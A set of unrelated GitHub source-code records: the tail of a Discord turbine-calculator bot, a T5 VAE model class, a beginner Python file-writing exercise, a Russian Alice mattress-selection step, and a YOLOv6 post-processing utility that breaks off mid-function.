Syntax:\\n\"\n \"`&stats [turbine string] [input rate] (dynamo efficiency)`\\n\"\n \"See page 4 for more details!\", inline=False)\n helpPage1.add_field(name=\"&help\", value=\"Prints this message.\", inline=False)\n helpPage1.add_field(name=\"&ping\", value=\"The infamous ping command. Returns ping (in ms) of the bot.\", inline=False)\n helpPage1.add_field(name=\"Easter eggs!\", value=\"The bot also contains a couple easter egg commands! Can you find them?\", inline=False)\n helpPage1.add_field(name=\"Navigation\", value=\"You can navigate the embeds by adding to the reactions of the bot.\\n\"\n \"▶ goes to the next page,\\n◀ goes to the previous page,\\n❌ exits the navigation menu.\")\n helpPage1.set_footer(text=footer)\n helpPage2 = discord.Embed(title=\"Help menu (Page 2)\", colour=0x123456,\n description=\"[Full List of Aliases]({})\".format(\n \"https://github.com/ThePoleThatFishes/Turbine-Bot/blob/master/aliases.txt\"\n ))\n helpPage2.add_field(name=\"&calc Details\", value=\"`mode`: The calculation mode. Refers to overhaul or pre-overhaul\"\n \" NC.\\nCheck list of aliases at the top for valid names.\\n`fuel`: The type of gas that\"\n \" enters the turbine. Usually a type of steam.\\nValid names can be found in the list of aliases.\\n`base RF/mB`: \"\n \"The base energy density of the gas (Can be decimal).\\n**__Not compatible with fuel\"\n \" type!__**\\n`ideal expansion`: The ideal expansion of the gas. \\nWritten as a number or a percentage. (eg. 4 and 400% are both ok)\\n**__Not compatible\"\n \" with fuel type!__**\\n`dimensions`: Turbine & Bearing dimensions. Written as `txby`, x is turbine diameter\\n\"\n \"and y is bearing diameter. **__Optional Parameter__**\\n\"\n \"`blades`: The blades used in the turbine. Each blade is separated by a space.\\nValid names can be found in the list\"\n \" of aliases. (top of the embed)\", inline=False)\n helpPage2.add_field(name=\"Examples of a &calc command\",\n value=\"`&calc nco hps steel ext s`\\nA turbine in NC Overhaul, with\"\n \" unspecified dimensions, that uses high pressure steam, and blades used are steel extreme steel.\\n `&calc nc lps t8b4 s s`\\n\"\n \"A 8x8x2 pre-overhaul turbine that has a 4x4 bearing, uses low pressure steam and blades used are steel steel.\\n A visual example of a command: (click image)\",\n inline=False)\n helpPage2.set_image(url=imageURL)\n helpPage3 = discord.Embed(title=\"Help menu (Page 3)\", colour=0x123456, description=\"A list of common aliases you can use!\")\n helpPage3.add_field(name=\"NC Version\", value=\"NC Overhaul: `nco`, `overhaul`\\n\"\n \"NC Preoverhaul: `nc`, `pre-overhaul`, `underhaul`\", inline=False)\n helpPage3.add_field(name=\"Steam Type\", value=\"High Pressure Steam: `hps`, `hpsteam`\\n\"\n \"Low Pressure Steam: `lps`, `lpsteam`\\n\"\n \"Steam (from other mods): `steam`, `meksteam`, `testeam`\", inline=False)\n helpPage3.add_field(name=\"Blades\", value=\"Stator: `st`, `sta`, `:stator:`\\n\"\n \"Steel: `s`, `ste`, `:steel:`\\n\"\n \"Extreme: `ext`, `ex`, `:extreme:`\\n\"\n \"SiC-SiC CMC: `sic`, `sicsic`, `:sicsic:`\", inline=False)\n helpPage3.set_footer(text=footer)\n helpPage4 = discord.Embed(title=\"Help menu (Page 4)\", colour=0x123456)\n helpPage4.add_field(name=\"&stats Details\", value=\"`turbine string`: A string that describes the turbine's dimensions, \"\n \"blades, fuel, etc. Obtained by running &calc on your desired turbine.\\n\"\n \"`input rate`: The gas input rate in mB/t.\\n\"\n \"`dynamo efficiency`: The dynamo (coil) efficiency of the turbine.\\n\"\n \"Can be a number or a percentage (eg. 1.039 or 103.9%) \"\n \"**__Optional Parameter__**\", inline=False)\n helpPage4.add_field(name=\"Example of a &stats command\", value=\"`&stats /overhaul/hps/16.0/4.0/10/4/aaaa/ 1450 101%`\\n\"\n \"This will calculate the stats of a turbine in overhaul,\\n\"\n \"that runs high pressure steam, is 10x10x4, has a 4x4 bearing,\\n\"\n \"blades are all steel, input rate is 1450 mB/t,\\n\"\n \"and dynamo efficiency is 101%.\", inline=False)\n helpPage4.set_footer(text=footer)\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, [helpPage1, helpPage2, helpPage3, helpPage4])\n\n\n@client.command(aliases=[\"turbine\", \"plan\"])\nasync def calc(ctx, *args): # args: (overhaul/underhaul) (RF density) (ideal expansion) (blades)\n blades = []\n gasName, inputError, args = None, False, list(args)\n error, turbineDim, bearingDim, dimsInput = \"\", 3, 1, False\n sanitizeInput = (\"*\", \"_\", \"`\", \"~\", \",\")\n\n for i in range(len(args)):\n for md in sanitizeInput:\n args[i] = args[i].replace(md, \"\")\n\n # checks if there's enough arguments\n try:\n # checks calculation mode (1st argument)\n if (args[0].lower()).replace(\" \", \"\") not in overhaulAliases + preoverhaulAliases:\n inputError = True\n error += \"\\\"{}\\\" is not a valid calculation mode!\\n\".format(args[0])\n else:\n args[0] = (args[0].lower()).replace(\" \", \"\")\n if args[0] in overhaulAliases:\n args[0] = overhaulAliases[0]\n elif args[0] in preoverhaulAliases:\n args[0] = preoverhaulAliases[0]\n\n # checks if the 2nd argument is a steam type or RF density, checks for invalid steam & invalid RF/mb\n try:\n typeDetection = float(args[1])\n if typeDetection <= 0.0:\n inputError = True\n error += \"Turbine fuel must have a positive energy density!\\n\"\n\n try:\n if args[2].endswith(\"%\"):\n args[2] = args[2].replace(\"%\", \"\")\n args[2] = float(args[2])/100.0\n else:\n args[2] = float(args[2])\n if args[2] <= 0.0:\n inputError = True\n error += \"Turbine fuel must have a positive expansion coefficient!\\n\"\n except ValueError:\n inputError = True\n error += \"Missing expansion coefficient parameter!\\n\"\n\n gasName = \"Custom\"\n\n # checks if turbine dimensions have been entered\n if re.search(\"t[0-9]\", args[3]):\n try:\n bearingDetect = (args[3].lower()).index(\"b\")\n turbineDim = int(args[3][1:bearingDetect])\n if not (3 <= turbineDim <= 24):\n inputError = True\n error += \"Turbine diameter must be between 3 and 24 blocks!\\n\"\n try:\n bearingDim = int(args[3][bearingDetect + 1:])\n if not (1 <= bearingDim <= turbineDim - 2 and turbineDim % 2 == bearingDim % 2):\n inputError = True\n error += \"Bearing diameter must be between 1 and Turbine diameter - 2! If turbine \" \\\n \"diameter is even, bearing must be even; The same applies for odd turbine diameter.\\n\"\n else:\n dimsInput = True\n blades = args[4:]\n except ValueError:\n inputError = True\n error += \"Invalid bearing dimension!\"\n except IndexError:\n inputError = True\n error += \"Turbine dimensions \\\"{}\\\" are invalid!\"\n\n else:\n dimsInput = False\n blades = args[3:]\n\n except ValueError:\n\n try:\n typeDetection = float(args[2])\n inputError = True\n error += \"You can't have both a fuel type and an ideal expansion!\\n\"\n except ValueError:\n pass\n\n steamFound = False\n gasName = args[1]\n\n for aliases in gasAliases.values():\n if (gasName.lower()).replace(\" \", \"\") in aliases:\n gasName = aliases[0]\n steamFound = True\n break\n\n if steamFound and (args[0] in preoverhaulAliases\n and gasName not in (\"hps\", \"lps\", \"steam\")):\n inputError = True\n error += \"Turbine fuel \\\"{}\\\" can't be used in {}!\\n\".format(gasName, args[0])\n\n if not steamFound:\n inputError = True\n error += \"Turbine fuel \\\"{}\\\" is invalid!\\n\".format(gasName)\n\n # checks for dimensions\n if re.search(\"t[0-9]\", args[2]):\n try:\n bearingDetect = (args[2].lower()).index(\"b\")\n turbineDim = int(args[2][1:bearingDetect])\n if not (3 <= turbineDim <= 24):\n inputError = True\n error += \"Turbine diameter must be between 3 and 24 blocks!\\n\"\n try:\n bearingDim = int(args[2][bearingDetect + 1:])\n if not (1 <= bearingDim <= turbineDim - 2 and turbineDim % 2 == bearingDim % 2):\n inputError = True\n error += \"Bearing diameter must be between 1 and Turbine diameter - 2! If turbine \" \\\n \"diameter is even, bearing must be even; The same applies for odd turbine diameter.\\n\"\n else:\n dimsInput = True\n blades = args[3:]\n except ValueError:\n inputError = True\n error += \"Invalid bearing dimension!\"\n except IndexError:\n inputError = True\n error += \"Turbine dimensions \\\"{}\\\" are invalid!\"\n\n else:\n dimsInput = False\n blades = args[2:]\n\n # checks for invalid blades\n for i1 in range(len(blades)):\n bladeFound = False\n\n for aliases in bladeAliases.values():\n if blades[i1].startswith(\"<\"):\n colon2 = blades[i1].find(\":\", 2)\n blades[i1] = blades[i1][2:colon2]\n else:\n blades[i1] = (blades[i1].lower()).replace(\" \", \"\")\n\n if blades[i1] in aliases:\n bladeFound = True\n blades[i1] = aliases[0]\n\n if bladeFound and (args[0] in preoverhaulAliases\n and blades[i1] not in (\"stator\", \"steel\", \"extreme\", \"sic\")):\n inputError = True\n error += \"Blade #{} ({}) does not exist in {}!\\n\".format(i1 + 1, blades[i1], args[0])\n\n if not bladeFound:\n inputError = True\n error += \"Blade #{} ({}) is invalid!\\n\".format(i1 + 1, blades[i1])\n except IndexError:\n inputError = True\n error += \"At least one argument is missing!\\n\"\n\n if len(blades) > 24:\n inputError = True\n error += \"This turbine is too long!\\n\"\n elif len(blades) < 1:\n inputError = True\n error += \"This turbine is too short!\\n\"\n\n if not inputError:\n mode = args[0]\n if gasName not in list(gasStats):\n gasRFMB = float(args[1])\n gasExp = float(args[2])\n else:\n gasRFMB = gasStats[gasName][0]\n gasExp = gasStats[gasName][1]\n\n if dimsInput:\n embedsList = calcStats(mode, gasName, gasRFMB, gasExp, blades, (turbineDim, bearingDim), None, None)\n else:\n embedsList = calcStats(mode, gasName, gasRFMB, gasExp, blades, None, None, None)\n\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, embedsList)\n\n else:\n results = discord.Embed(title=\"Error in command!\", colour=0xd50505, description=\"Oh no! The bot could not\"\n \" calculate the turbine!\")\n if len(error) > 1000:\n error = \"{}... (too long)\".format(error[:1000])\n results.add_field(name=\"Errors detected:\", value=\"{}\".format(error), inline=False)\n results.set_footer(text=\"Turbine Calculator Bot by FishingPole#3673\")\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, [results])\n\n\n@client.command()\nasync def stats(ctx, *args): # &stats (turbine string) (mB/t input) (coil efficiency)\n args, inputError = list(args), False\n turbineInfo, bladeList, embedsList, errorString = [], [], [], \"\"\n\n try:\n args[1] = float(args[1])\n if args[1] < 0:\n inputError = True\n errorString += \"Gas input must be a positive number!\\n\"\n except ValueError:\n inputError = True\n errorString += \"Gas input must be a positive number!\\n\"\n except IndexError:\n inputError = True\n errorString += \"Gas input is missing!\\n\"\n\n try:\n if args[2].endswith(\"%\"):\n args[2] = args[2].replace(\"%\", \"\")\n args[2] = float(args[2])/100.0\n else:\n args[2] = float(args[2])\n except IndexError:\n args.append(None)\n except ValueError:\n inputError = True\n errorString += \"Dynamo efficiency must be a positive number!\\n\"\n\n if not inputError:\n if args[0].count(\"/\") == 8:\n slash2 = 0\n for i in range(7):\n slash1 = slash2\n slash2 = args[0].find(\"/\", slash1 + 1)\n turbineInfo.append(args[0][slash1 + 1:slash2])\n\n for char in turbineInfo[-1]:\n if char in bladeConversions.values():\n charPos = list(bladeConversions.values()).index(char)\n bladeList.append(list(bladeConversions)[charPos])\n\n embedsList = calcStats(turbineInfo[0], turbineInfo[1], float(turbineInfo[2]), float(turbineInfo[3]), bladeList,\n (int(turbineInfo[4]), int(turbineInfo[5])), args[1], args[2])\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, embedsList)\n else:\n errorEmbed = discord.Embed(title=\"Error in command!\", colour=0xd50505, description=\"Oh no! The bot could not\"\n \" calculate the turbine!\")\n errorEmbed.add_field(name=\"Errors detected:\", value=\"{}\".format(errorString), inline=False)\n errorEmbed.set_footer(text=\"Turbine Calculator Bot by FishingPole#3673\")\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, [errorEmbed])\n\n\nclient.run(token)\n","repo_name":"ThePoleThatFishes/Turbine-Bot","sub_path":"TurbineBot.py","file_name":"TurbineBot.py","file_ext":"py","file_size_in_byte":34706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18804245063","text":"from typing import Optional, Tuple, Union\n\nimport torch\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\n\nfrom transformers import T5ForConditionalGeneration\nfrom transformers.utils import logging\n\nfrom .outputs import BaseModelOutput, Seq2SeqLMOutput, VAEOutput, Seq2SeqVAELMOutput\n\nlogger = logging.get_logger(__name__)\n\nclass T5VAEForConditionalGeneration(T5ForConditionalGeneration):\n def __init__(self, config, dims_hidden, dim_latent, p):\n super().__init__(config)\n\n encoder = []\n encoder_input_layer = nn.Linear(config.d_model, dims_hidden[0])\n for dim_in, dim_out in zip(dims_hidden[:-1], dims_hidden[1:]):\n encoder.append(\n nn.Sequential(\n nn.Dropout(p),\n nn.Linear(dim_in, dim_out),\n nn.ReLU()\n )\n )\n self.vae_encoder = nn.Sequential(\n encoder_input_layer,\n *encoder\n )\n\n self.vae_fc_mu = nn.Linear(dims_hidden[-1], dim_latent)\n self.vae_fc_var = nn.Linear(dims_hidden[-1], dim_latent)\n\n dims_hidden_reversed = dims_hidden[::-1]\n decoder = []\n decoder_input_layer = nn.Linear(dim_latent, dims_hidden_reversed[0])\n decoder_output_layer = nn.Sequential(\n nn.Linear(dims_hidden_reversed[-1], config.d_model),\n nn.Tanh()\n )\n for dim_in, dim_out in zip(dims_hidden_reversed[:-1], dims_hidden_reversed[1:]):\n decoder.append(\n nn.Sequential(\n nn.Dropout(p),\n nn.Linear(dim_in, dim_out),\n nn.ReLU()\n )\n )\n self.vae_decoder = nn.Sequential(\n decoder_input_layer,\n *decoder,\n decoder_output_layer\n )\n\n def forward(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n decoder_input_ids: Optional[torch.LongTensor] = None,\n decoder_attention_mask: Optional[torch.BoolTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n decoder_head_mask: Optional[torch.FloatTensor] = None,\n cross_attn_head_mask: Optional[torch.Tensor] = None,\n encoder_outputs: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n decoder_inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = True,\n return_dict: Optional[bool] = None,\n teacher_forcing: Optional[float] = None\n ) -> Union[Tuple[torch.FloatTensor], Seq2SeqLMOutput]:\n\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n if head_mask is not None and decoder_head_mask is None:\n if self.config.num_layers == self.config.num_decoder_layers:\n decoder_head_mask = head_mask\n\n encoder_outputs = self.encode(\n input_ids, \n attention_mask, \n head_mask, \n encoder_outputs, \n inputs_embeds, \n output_attentions, \n output_hidden_states, \n return_dict\n )\n\n hidden_states = encoder_outputs[0]\n vae_output = self.autoencode(hidden_states, attention_mask)\n\n if teacher_forcing is None:\n hidden_states = vae_output.recon\n else:\n coefficients = torch.rand_like(hidden_states)\n hidden_states = (coefficients <= teacher_forcing).to(torch.bfloat16)*hidden_states + (coefficients > teacher_forcing).to(torch.bfloat16)*vae_output.recon\n\n decoder_outputs = self.decode(\n hidden_states,\n attention_mask, \n decoder_input_ids, \n decoder_attention_mask, \n decoder_head_mask, \n cross_attn_head_mask,\n encoder_outputs, \n past_key_values, \n decoder_inputs_embeds, \n labels, \n use_cache, \n output_attentions,\n output_hidden_states, \n return_dict\n )\n \n decoder_outputs.mu = vae_output.mu\n decoder_outputs.logvar = vae_output.logvar\n decoder_outputs.latent = vae_output.latent\n decoder_outputs.recon=vae_output.recon\n\n return decoder_outputs\n\n def autoencode(\n self,\n hidden_states,\n attention_mask\n ):\n vae_h = self.vae_encoder(hidden_states)\n vae_mu = self.vae_fc_mu(vae_h)\n vae_logvar = self.vae_fc_var(vae_h)\n vae_std = torch.exp(0.5*vae_logvar)\n vae_eps = torch.randn_like(vae_std)\n vae_z = vae_eps * vae_std + vae_mu\n recon = self.vae_decoder(vae_z)\n\n return VAEOutput(vae_mu, vae_logvar, vae_z, recon)\n\n def encode(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n encoder_outputs: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ):\n if encoder_outputs is None:\n encoder_outputs = self.encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n inputs_embeds=inputs_embeds,\n head_mask=head_mask,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):\n encoder_outputs = BaseModelOutput(\n last_hidden_state=encoder_outputs[0],\n hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,\n attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,\n )\n\n return encoder_outputs\n\n def decode(\n self,\n hidden_states, \n attention_mask: Optional[torch.FloatTensor] = None,\n decoder_input_ids: Optional[torch.LongTensor] = None,\n decoder_attention_mask: Optional[torch.BoolTensor] = None,\n decoder_head_mask: Optional[torch.FloatTensor] = None,\n cross_attn_head_mask: Optional[torch.Tensor] = None,\n encoder_outputs: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n decoder_inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ):\n if self.model_parallel:\n torch.cuda.set_device(self.decoder.first_device)\n\n if labels is not None and decoder_input_ids is None and decoder_inputs_embeds is None:\n decoder_input_ids = self._shift_right(labels)\n\n if self.model_parallel:\n torch.cuda.set_device(self.decoder.first_device)\n hidden_states = hidden_states.to(self.decoder.first_device)\n if decoder_input_ids is not None:\n decoder_input_ids = decoder_input_ids.to(self.decoder.first_device)\n if attention_mask is not None:\n attention_mask = attention_mask.to(self.decoder.first_device)\n if decoder_attention_mask is not None:\n decoder_attention_mask = decoder_attention_mask.to(self.decoder.first_device)\n\n decoder_outputs = self.decoder(\n input_ids=decoder_input_ids,\n attention_mask=decoder_attention_mask,\n inputs_embeds=decoder_inputs_embeds,\n past_key_values=past_key_values,\n encoder_hidden_states=hidden_states,\n encoder_attention_mask=attention_mask,\n head_mask=decoder_head_mask,\n cross_attn_head_mask=cross_attn_head_mask,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n sequence_output = decoder_outputs[0]\n\n if self.model_parallel:\n torch.cuda.set_device(self.encoder.first_device)\n self.lm_head = self.lm_head.to(self.encoder.first_device)\n sequence_output = sequence_output.to(self.lm_head.weight.device)\n\n if self.config.tie_word_embeddings:\n sequence_output = sequence_output * (self.model_dim**-0.5)\n\n lm_logits = self.lm_head(sequence_output)\n\n loss = None\n if labels is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-100)\n labels = labels.to(lm_logits.device)\n loss = loss_fct(lm_logits.view(-1, lm_logits.size(-1)), labels.view(-1))\n\n if not return_dict:\n output = (lm_logits,) + decoder_outputs[1:] + encoder_outputs\n return ((loss,) + output) if loss is not None else output\n\n return Seq2SeqVAELMOutput(\n loss=loss,\n logits=lm_logits,\n past_key_values=decoder_outputs.past_key_values,\n decoder_hidden_states=decoder_outputs.hidden_states,\n decoder_attentions=decoder_outputs.attentions,\n cross_attentions=decoder_outputs.cross_attentions,\n encoder_last_hidden_state=encoder_outputs.last_hidden_state,\n encoder_hidden_states=encoder_outputs.hidden_states,\n encoder_attentions=encoder_outputs.attentions,\n )","repo_name":"AxelGiottonini/VAE-T5","sub_path":"src/modeling_t5vae.py","file_name":"modeling_t5vae.py","file_ext":"py","file_size_in_byte":10059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11286335379","text":"# To write files, use the write method, which writes a string to the file\n\nfile = open(\"new.txt\", \"w\") # The 'w' mode writes a file if it doesn't already exist\nfile.write(\"I want to be a programmer, hacker and a full stack web developer\\n\"\n \"Plus I want to hack the government, not for malicious purposes but to expose of the truth!\")\nfile.close()\n\nfile = open(\"new.txt\", \"r\")\nprint(file.read())\nfile.close()\n\n# When a file is opened in write mode, the file's existing content is deleted\nfile = open(\"new.txt\", \"r\")\nprint(\"\\nReading initial contents\")\nprint(file.read())\nprint(\"\\nFINISHED\")\n\nfile = open(\"new.txt\", \"w\")\nfile.write(\"Programming is magical, its like writing poetry and revealing what is inside your heart\\n\"\n \"Not just for fun but for the world to see your inner abilities\")\nfile.close()\n\nfile = open(\"new.txt\", \"r\")\nprint(\"\\nReading new contents\\n\")\nprint(file.read())\nprint(\"\\nDONE\")\nfile.close()\n\n# The write method returns the number of bytes written to a file, if successful\nmsg = \"Ghettocole is fucken awesome\"\nfile = open(\"msg.txt\", \"w\")\n_bytes = file.write(msg)\nprint(_bytes)\nfile.close()\n","repo_name":"GhettoCole/Python3-","sub_path":"Exceptions & Files/Writing files.py","file_name":"Writing files.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23507438381","text":"from .hardness import Hardness\nimport random\n\nclass Size:\n def __init__ (self) :\n self.dictionary = [\n 'я помогу подобрать матрас.\\r\\n',\n 'ответьте на несколько вопросов, чтобы я подобрала вам матрас.\\r\\n',\n 'помогу вам выбрать комфортный матрас.\\r\\n',\n 'давайте уточним некоторые детали.\\r\\n'\n ]\n self.question = [\n 'Какой ширины матрас вам нужен?'\n ]\n self.hello = ['Привет']\n self.name = 'size'\n self.nextStep = Hardness()\n\n def getName (self) :\n return self.name\n \n def getText (self, previousAnswer = '') :\n if previousAnswer == '':\n messageIndex = random.randint(0,3)\n # helloIndex = random.randint(0,1)\n # questionIndex = random.randint(0,1)\n return self.hello[0] + \", \" + self.dictionary[messageIndex] + self.question[0]\n if previousAnswer == 0:\n self.nextStep = Size()\n return \"Вы не дали мне ширину матраса. Пожалуйста, скажите какой ширины матрас нужен вам?\"\n\n def saveAnswer(self, userSession, userMessage):\n entities = userMessage['nlu']['entities']\n width = 0\n isNum = False\n for k in entities :\n if k['type'] == \"YANDEX.NUMBER\":\n if not isNum :\n width = k['value']\n isNum = True\n userSession['answers']['size'] = width\n if width == 0 :\n self.nextStep = Size()\n \n\n def getNextStep (self) :\n return self.nextStep","repo_name":"Kirich11/ikea-alice","sub_path":"steps/size.py","file_name":"size.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19429126775","text":"import time\nimport sys\nimport os\nimport numpy as np\nimport cv2\nimport torch.nn as nn\nimport torch\nimport torchvision\n\nfrom asone.detectors.yolov6.yolov6.layers.common import Conv\n\ndef nms(boxes, scores, iou_threshold):\n # Sort by score\n sorted_indices = np.argsort(scores)[::-1]\n\n keep_boxes = []\n while sorted_indices.size > 0:\n # Pick the last box\n box_id = sorted_indices[0]\n keep_boxes.append(box_id)\n\n # Compute IoU of the picked box with the rest\n ious = compute_iou(boxes[box_id, :], boxes[sorted_indices[1:], :])\n\n # Remove boxes with IoU over the threshold\n keep_indices = np.where(ious < iou_threshold)[0]\n\n # print(keep_indices.shape, sorted_indices.shape)\n sorted_indices = sorted_indices[keep_indices + 1]\n\n return keep_boxes\n\n\ndef process_output(output, img_height, img_width, \n input_width, input_height,\n conf_thres, iou_thres):\n predictions = np.squeeze(output)\n\n # Filter out object confidence scores below threshold\n obj_conf = predictions[:, 4]\n predictions = predictions[obj_conf > conf_thres]\n obj_conf = obj_conf[obj_conf > conf_thres]\n\n # Multiply class confidence with bounding box confidence\n predictions[:, 5:] *= obj_conf[:, np.newaxis]\n\n # Get the scores\n scores = np.max(predictions[:, 5:], axis=1)\n\n # Filter out the objects with a low score\n predictions = predictions[obj_conf > conf_thres]\n scores = scores[scores > conf_thres]\n\n # Get the class with the highest confidence\n class_ids = np.argmax(predictions[:, 5:], axis=1)\n\n # Get bounding boxes for each object\n boxes = process_and_scale_boxes(predictions, img_height, img_width, \n input_width, input_height)\n\n # Apply non-maxima suppression to suppress weak, overlapping bounding boxes\n indices = nms(boxes, scores, iou_thres)\n\n return boxes[indices], scores[indices], class_ids[indices]\n\ndef compute_iou(box, boxes):\n # Compute xmin, ymin, xmax, ymax for both boxes\n xmin = np.maximum(box[0], boxes[:, 0])\n ymin = np.maximum(box[1], boxes[:, 1])\n xmax = np.minimum(box[2], boxes[:, 2])\n ymax = np.minimum(box[3], boxes[:, 3])\n\n # Compute intersection area\n intersection_area = np.maximum(0, xmax - xmin) * np.maximum(0, ymax - ymin)\n\n # Compute union area\n box_area = (box[2] - box[0]) * (box[3] - box[1])\n boxes_area = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n union_area = box_area + boxes_area - intersection_area\n\n # Compute IoU\n iou = intersection_area / union_area\n\n return iou\n\n\ndef xywh2xyxy(x):\n # Convert bounding box (x, y, w, h) to bounding box (x1, y1, x2, y2)\n y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n y[..., 0] = x[..., 0] - x[..., 2] / 2\n y[..., 1] = x[..., 1] - x[..., 3] / 2\n y[..., 2] = x[..., 0] + x[..., 2] / 2\n y[..., 3] = x[..., 1] + x[..., 3] / 2\n return y\n\ndef prepare_input(image, input_width, input_height):\n \n input_img = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # Resize input image\n input_img = cv2.resize(input_img, (input_width, input_height))\n\n # Scale input pixel values to 0 to 1\n input_img = input_img / 255.0\n input_img = input_img.transpose(2, 0, 1)\n input_tensor = input_img[np.newaxis, :, :, :].astype(np.float32)\n\n return input_tensor\n\ndef process_and_scale_boxes(predictions, img_height, img_width, \n input_width, input_height):\n \n predictions = np.delete(predictions, 0, axis=1)\n # Extract boxes from predictions\n boxes = predictions[:, :4]\n # Scale boxes to original image dimensions\n boxes /= np.array([input_width, input_height, input_width, input_height])\n boxes *= np.array([img_width, img_height, img_width, img_height])\n # Convert boxes to xyxy format\n # boxes = xywh2xyxy(boxes)\n \n boxes = boxes[:,:4]\n class_ids = predictions[:,4:5]\n scores = predictions[:,5:]\n return boxes, scores, class_ids\n\ndef load_pytorch(weights, map_location=None, inplace=True, fuse=False):\n \"\"\"Load model from checkpoint file.\"\"\"\n ckpt = torch.load(weights, map_location=map_location) # load\n model = ckpt['ema' if ckpt.get('ema') else 'model'].float()\n if fuse:\n model = fuse_model(model).eval()\n else:\n model = model.eval()\n return model\n\ndef fuse_model(model):\n for m in model.modules():\n if type(m) is Conv and hasattr(m, \"bn\"):\n m.conv = fuse_conv_and_bn(m.conv, m.bn) # update conv\n delattr(m, \"bn\") # remove batchnorm\n m.forward = m.forward_fuse # update forward\n return model\n\ndef fuse_conv_and_bn(conv, bn):\n # Fuse convolution and batchnorm layers https://tehnokv.com/posts/fusing-batchnorm-and-conv/\n fusedconv = (\n nn.Conv2d(\n conv.in_channels,\n conv.out_channels,\n kernel_size=conv.kernel_size,\n stride=conv.stride,\n padding=conv.padding,\n groups=conv.groups,\n bias=True,\n )\n .requires_grad_(False)\n .to(conv.weight.device)\n )\n\n # prepare filters\n w_conv = conv.weight.clone().view(conv.out_channels, -1)\n w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))\n fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))\n\n # prepare spatial bias\n b_conv = (\n torch.zeros(conv.weight.size(0), device=conv.weight.device)\n if conv.bias is None\n else conv.bias\n )\n b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(\n torch.sqrt(bn.running_var + bn.eps)\n )\n fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)\n\n return fusedconv\n\n\ndef non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False, max_det=300):\n \"\"\"Runs Non-Maximum Suppression (NMS) on inference results.\n This code is borrowed from: https://github.com/ultralytics/yolov5/blob/47233e1698b89fc437a4fb9463c815e9171be955/utils/general.py#L775\n Args:\n prediction: (tensor), with shape [N, 5 + num_classes], N is the number of bboxes.\n conf_thres: (float) confidence threshold.\n iou_thres: (float) iou threshold.\n classes: (None or list[int]), if a list is provided, nms only keep the classes you provide.\n agnostic: (bool), when it is set to True, we do class-independent nms, otherwise, different class would do nms respectively.\n multi_label: (bool), when it is set to True, one box can have multi labels, otherwise, one box only huave one label.\n max_det:(int), max number of output bboxes.\n\n Returns:\n list of detections, echo item is one tensor with shape (num_boxes, 6), 6 is for [xyxy, conf, cls].\n \"\"\"\n\n num_classes = prediction.shape[2] - 5 # number of classes\n pred_candidates = prediction[..., 4] > conf_thres # candidates\n\n # Check the parameters.\n assert 0 <= conf_thres <= 1, f'conf_thresh must be in 0.0 to 1.0, however {conf_thres} is provided.'\n assert 0 <= iou_thres <= 1, f'iou_thres must be in 0.0 to 1.0, however {iou_thres} is provided.'\n\n # Function settings.\n max_wh = 4096 # maximum box width and height\n max_nms = 30000 # maximum number of boxes put into torchvision.ops.nms()\n time_limit = 10.0 # quit the function when nms cost time exceed the limit time.\n multi_label &= num_classes > 1 # multiple labels per box\n\n tik = time.time()\n output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0]\n for img_idx, x in enumerate(prediction): # image index, image inference\n x = x[pred_candidates[img_idx]] # confidence\n\n # If no box remains, skip the next process.\n if not 